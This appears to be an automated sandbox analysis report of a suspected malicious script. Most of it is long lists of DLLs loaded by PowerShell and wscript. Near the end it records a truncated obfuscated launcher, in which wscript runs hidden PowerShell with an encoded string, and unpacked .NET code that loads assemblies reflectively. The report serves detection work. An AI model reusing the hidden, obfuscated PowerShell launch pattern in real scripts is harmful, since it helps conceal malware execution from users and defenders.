                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.2591558298.000001BCABC19000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32W source: powershell.exe, 00000007.00000002.2591558298.000001BCABC64000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ion.pdb source: powershell.exe, 00000007.00000002.2591558298.000001BCABC64000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: lib.pdb{@ source: powershell.exe, 00000007.00000002.2090443730.000001BC91BA8000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell $ExeNy = 'J?Bz?HE?YQBh?Go?I??9?C??Jw?w?DE?Mw?n?Ds?J?B3?Gk?a?Bs", "0", "false");
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell $ExeNy = 'J?Bz?HE?YQBh?Go?I??9?C??Jw?w?DE?Mw?n?Ds?J?B3?Gk?a?Bs", "0", "false");
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell $ExeNy = 'J?Bz?HE?YQBh?Go?I??9?C??Jw?w?DE?Mw?n?Ds?J?B3?Gk?a?Bs", "0", "false");
                Source: 4.2.powershell.exe.155c408daf0.1.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                Source: 4.2.powershell.exe.155dc4f0000.4.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                Source: 4.2.powershell.exe.155c5369780.0.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                Source: 19.2.powershell.exe.240c0f59258.0.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                Source: 33.2.powershell.exe.1c03c941ab0.1.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
